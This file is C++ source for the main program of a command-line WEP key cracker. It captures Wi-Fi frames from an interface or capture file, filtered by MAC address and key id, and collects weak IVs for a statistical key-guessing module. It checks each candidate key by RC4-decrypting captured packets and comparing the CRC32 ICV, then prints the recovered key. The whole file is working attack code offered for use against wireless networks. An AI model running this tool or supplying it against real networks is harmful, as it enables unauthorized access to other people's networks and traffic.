#include <unistd.h> // getopt
#include <stdio.h>
#include <time.h> // time
#include <stdlib.h> // srand
#include <libgen.h> // basename

#include "WEPCrack.h"
#include "util.h"
#include "Generator.h"

#define SRC_MAIN "[main] "

class CheckKey: public binary_function<const vector<byte>, const vector<byte>, bool> {
	private:
		int I;
		int l;
		int N;
		
	public:
		CheckKey(int I, int l, int N): I(I), l(l), N(N) { }
		
		typedef const vector<byte> first_argument_type;
		typedef const vector<byte> second_argument_type;
		typedef bool result_type;
		
		result_type operator() (first_argument_type packet, second_argument_type wep_key) const {
			unsigned int  i,j;  // RC4 counters
			unsigned char S[N]; // RC4 S-box
			vector<byte> key = wep_key;

			// copy IV from packet to get RC4 key
			for(i=I; i>0; i--) // watch it! i is unsigned!!! and always >=0 
				key.insert(key.begin(), packet[24+i-1]); // 24 = first IV byte

			// KSA
			for(i=0; i<N; i++)
				S[i]=i;
			j=0;
			
			for(i=0; i<N; i++) {
				j= j + S[i] + key[i%key.size()]; j%=N;
				swap(S[i], S[j]);
			}

			// decrypt & verify
			CRC32 crc;
			unsigned char decr;

			i=0; j=0;
			for(int k=24+I+1; k<packet.size()-4; k++) {
				// PRGA
				i++; 	 i%=N;
				j+=S[i]; j%=N;
				swap(S[i], S[j]);

				// decrypt
				decr = S[ (S[i]+S[j])%N ] ^ packet[k]; 

				// crc32
				crc.Update(decr);
			}

			crc.Finish();

			for(int k=0; k<4; k++) {
				// PRGA
				i++; 	 i%=N;
				j+=S[i]; j%=N;
				swap(S[i], S[j]);

				// decrypt
				decr = S[ (S[i]+S[j])%N ] ^ packet[packet.size()-4+k]; 

				// ICV has reverse byte order
				if (crc[k] != decr)
					return false;
			}

			return true;
		}
};

vector<byte> string2key(string str) {
	char c1, c2;
	vector<byte> rez;
	for (int i=0; i<str.size(); i+=2) {
		c1 = tolower(str[i]);
		c2 = tolower(str[i+1]);

		if (isdigit(c1))
			c1 -= '0';
		else
			c1 = 10 + c1 - 'a';

		if (isdigit(c2))
			c2 -= '0';
		else
			c2 = 10 + c2 - 'a';
		rez.push_back( (c1 << 4) | c2 );
	}

	return rez;
}

void usage(char* progname) {
	
	assert(progname);

	char* prog = basename(progname);
	
	printf("usage: %s -i iface\n", prog);
	printf("       %s -r file\n", prog);
	printf("       %s -g len\n", prog);
	printf("       %s -G key\n\n", prog);

	puts(
"options:"								"\n"
" -d level   set debug level (default: 2)"				"\n"
" -d ml      set debug level for module m to level l"			"\n"
" -f n       fork next key word when more then n guesses"		"\n"
" -g len     use random generator source with random key of length len"	"\n"
" -G key     use random generator source with specified key"		"\n"
" -h         this cruft"						"\n"
" -i iface   get frames from interface"					"\n"
// " -I num     set IV len"						"\n"
" -k keyid   crack key with keyid (default: any)"			"\n"
" -l num     set key length (default: 13)"				"\n"
" -L n       use -t value for first n key words (default: 2)"		"\n"
" -m mac     crack key for mac address (default: any)"			"\n"
" -M max     try to keep loadaverage at max level (default: 30)"	"\n"
// " -N num     set bits per word"					"\n"
" -r file    get frames from file"					"\n"
" -t n       use top n guesses for lower key words (see -L) (default: 3) \n"
" -T n       use top n guesses for higher key words (default: 1)"	"\n"
									"\n"
"debug module names (option -d):"					"\n"
" c  crack"							"\n"
" g  generator"							"\n"
" m  monitor"							"\n"
" M  main"							"\n"
	);

}

int main(int argc, char *argv[]) {
	// set default values
	int I = 3; 	// IV len [words]
	int l = 13; 	// key len [words]
	int Nbits = 8;	// bits per word
	int N = 256;	// different values per word (= 2^Nbits)
	int top = 3;	// select top 3 guesses for some key word
	int top2 = 1;   // select top 1 guess for words higher than level
	int level = 2;	// use top for first 2 words, after that use top2
	int fork = 2;	// fork next word when at least 2 guesses for word exist
	int keyid = -1;	// use frames with this keyid
	int rand_len = -1; // random key length not set
	int loadavg = 30; // try to keep loadavg below this value
	vector<byte> rand_key; // random key
	string iface, file, mac;

	int debug_main=2; // debug level for main
	int debug_gen=2;  // debug level for generator module
	int debug_crack=2; // debug level for cracker threads
	int debug_mon=2; // debug level for monitor thread

	srand(time(NULL)); // set poor man's random seed for the whole program

	DebugPrint d("[main] ");
	d.setLevel(debug_main);

	while(1) {

		int param = getopt(argc, argv, "d:f:g:G:hi:k:l:L:m:M:r:t:T:");
		int temp;

		if (param == -1) // no more params
			break;

		switch(param) {
			case 'd':
				assert(optarg);
				if (isdigit(optarg[0])) { // just one digit -> set value for the whole program
					temp = atoi(optarg);
					if (temp <= 0)
						d.printWarning("debug <= 0, using defaults\n");
					else {
						debug_main = debug_gen = debug_crack = debug_mon = temp;
						d.setLevel(debug_main);
					}
				} else {
					temp = atoi(optarg+1);
					if (temp <= 0)
						d.printWarning("debug <= 0, using defaults\n");
					switch(optarg[0]) {
						case 'c': debug_crack = temp;
							  break;
						case 'M': debug_main = temp;
							  d.setLevel(debug_main);
							  break;
						case 'g': debug_gen = temp;
							  break;
						case 'm': debug_mon = temp;
							  break;
						default: d.printWarning("unknown debug module: %c\n", optarg[0]);
					}
				}
				break;
			case 'f':
				assert(optarg);
				temp = atoi(optarg);
				if (temp <= 0) 
					d.printWarning("fork <= 0, using defaults\n");
				else
					fork = temp;
				break;
			
			case 'g':
				assert(optarg);
				temp = atoi(optarg);
				if (temp <= 0) {
					d.printError("random key length <= 0");
					exit(1);
				}
				if (!file.empty() || !iface.empty() || 
						!rand_key.empty()) {
					d.printError("multiple packet sources set\n");
					exit(1);
				}
				rand_len = temp;
				l = rand_len;
				break;
				
			case 'G': {
				assert(optarg);
				string randkey = optarg;
				if (randkey.npos != randkey.find_first_not_of("0123456789abcdefABCDEF")) {
					d.printError("bad random key: non-hex digits found: %s\n", optarg);
					exit(1);
				}

				if (randkey.size()%2 != 0) {
					d.printError("bad random key: odd number of digits found: %s\n", optarg);
					exit(1);
				}
				
				if (!iface.empty() || !file.empty() || rand_len>0) {
					d.printError("multiple packet sources set\n");
					exit(1);
				}
				rand_key = string2key(randkey);
				break;
				  }
			case 'h':
				  usage(argv[0]);
				  exit(0);
			case 'i':
				if (!file.empty() || !rand_key.empty() || 
						rand_len > 0) {
					d.printError("multiple packet sources set\n");
					exit(1);
				}
				assert(optarg);
				iface = optarg;
				break;

			case 'I':
				assert(optarg);
				temp = atoi(optarg);
				if (temp <= 0)
					d.printWarning("IV len <= 0, using defaults\n");
				else
					I = temp;
				break;

			case 'k':
				assert(optarg);
				temp = atoi(optarg);
				if (temp < 0 || temp > 3)
					d.printWarning("keyid not in range [0,3], using defaults\n");
				else
					keyid = temp;
				break;

			case 'l':
				assert(optarg);
				temp = atoi(optarg);
				if (temp <= 0)
					d.printWarning("key lenght <=0, using defaults\n");
				else
					l = temp;
				break;

			case 'L':
				assert(optarg);
				temp = atoi(optarg);
				if (temp < 0)
					d.printWarning("level < 0, using defaults\n");
				else
					level = temp;
				break;

			case 'm':
				assert(optarg);
				mac = checkmac(optarg);
				if (mac.empty()) {
					d.printError("bad mac address: %s\n", optarg);
					exit(1);
				}
				break;

			case 'M':
				assert(optarg);
				temp = atoi(optarg);
				if (temp <= 0) {
					d.printError("loadaverage < 0, using defaults : %s\n", optarg);
					exit(1);
				} else
					loadavg = temp;
				break;

			case 'N':
				assert(optarg);
				temp = atoi(optarg);
				if (temp <= 0 || temp >8)
					d.printWarning("number of bits per word not in range [1,8], using defaults\n");
				else
					Nbits = temp;
					N = 1 << Nbits;
				break;
				
			case 'r':
				if (!iface.empty() || !rand_key.empty() ||
						rand_len > 0) {
					d.printError("multiple packet sources set\n");
					exit(1);
				}
				assert(optarg);
				file = optarg;
				break;

			case 't':
				assert(optarg);
				temp = atoi(optarg);
				if (temp <= 0)
					d.printWarning("top <= 0, using defaults\n");
				else
					top = temp;
				break;

			case 'T':
				assert(optarg);
				temp = atoi(optarg);
				if (temp <= 0)
					d.printWarning("top2 <= 0, using defaults\n");
				else
					top2 = temp;
				break;
		}
	}

	// check if any packet source set
	if (iface.empty() && file.empty() && rand_key.empty() && rand_len < 0) {
		d.printError("packet source not set\n\n");
		usage(argv[0]);
		exit(1);
	}

	d.printVerbose("IV length is %d\n", I);
	d.printVerbose("key length is %d\n", l);
	d.printVerbose("%d bits per word\n", Nbits);
	d.printVerbose("fork for top %d guesses when key word <= %d\n", top, level);
	d.printVerbose("fork for top %d guesses when key word > %d\n", top2, level);
	d.printVerbose("keep load average below %d\n", loadavg);
	if (keyid!=-1)
		d.printVerbose("keyid is %d\n", keyid);
	if ((!iface.empty() || !file.empty()) && !mac.empty())
		d.printVerbose("mac filter is %s\n", mac.c_str());
	if (!iface.empty())
		d.printVerbose("using interface %s\n", iface.c_str());
	if (!file.empty())
		d.printVerbose("using file %s\n", file.c_str());
	if (rand_len>0 && rand_len != l)
		d.printWarning("generator and wep key lengths differ (%d!=%d)\n", rand_len, l);
	
	WeakIV iv;
	Generator* gen = NULL;

	if (!file.empty() || !iface.empty()) 
		try {
			gen = new CaptureGenerator(
				file.empty()?iface.c_str():file.c_str(), 
				mac.empty()?NULL:mac.c_str(),
				keyid, !iface.empty(),
				debug_gen);
		} catch (runtime_error& err) {
			d.printError("error starting capture: %s\n", 
					err.what());
			exit(1);
		}

	else {
		if (rand_len > 0)
			gen = new RandomGenerator(rand_len, debug_gen);
		else
			gen = new RandomGenerator(rand_key, debug_gen);

	}

	assert(gen);
	gen->setDebugLevel(debug_gen);
	
	Monitor mon(I,l,N, top, level, fork, top2, loadavg, 
			debug_mon, debug_crack);

	vector<byte> key;
	vector<byte> packet;
	list<vector<byte> > test_packets;
	CheckKey key_checker(I,l,N);
	
	while(1) {
		bool newIV = false;
		bool newKey = false;

		if (test_packets.size() < 10) { // get packets & IVs
			if (gen->getPacket(packet)) {
				test_packets.push_back(packet);
				if (gen->extractIV(packet, iv)) {
					mon.addIV(iv);
					newIV = true;
				}
			}
		} else if (gen->getWeakIV(iv)) { // get only IVs
			mon.addIV(iv);
			newIV = true;
		}
		
		if (test_packets.size()>0 && mon.getNextKey(key)) {
			newKey = true;
			int n = count_if(test_packets.begin(), test_packets.end(), bind2nd(key_checker, key));

			if (n>0) {
				// always print key
				printf("[main] FOUND KEY (%d/%d): %s\n", n, test_packets.size(),
				  d.printVector("", key,":").c_str());
				exit(0);
			} else {
				d.printVerbose("%s\n",
				  d.printVector("bad key: ", key).c_str());
			}	
		}

		if (!newIV && !newKey)
			sleep(5);
	}
}
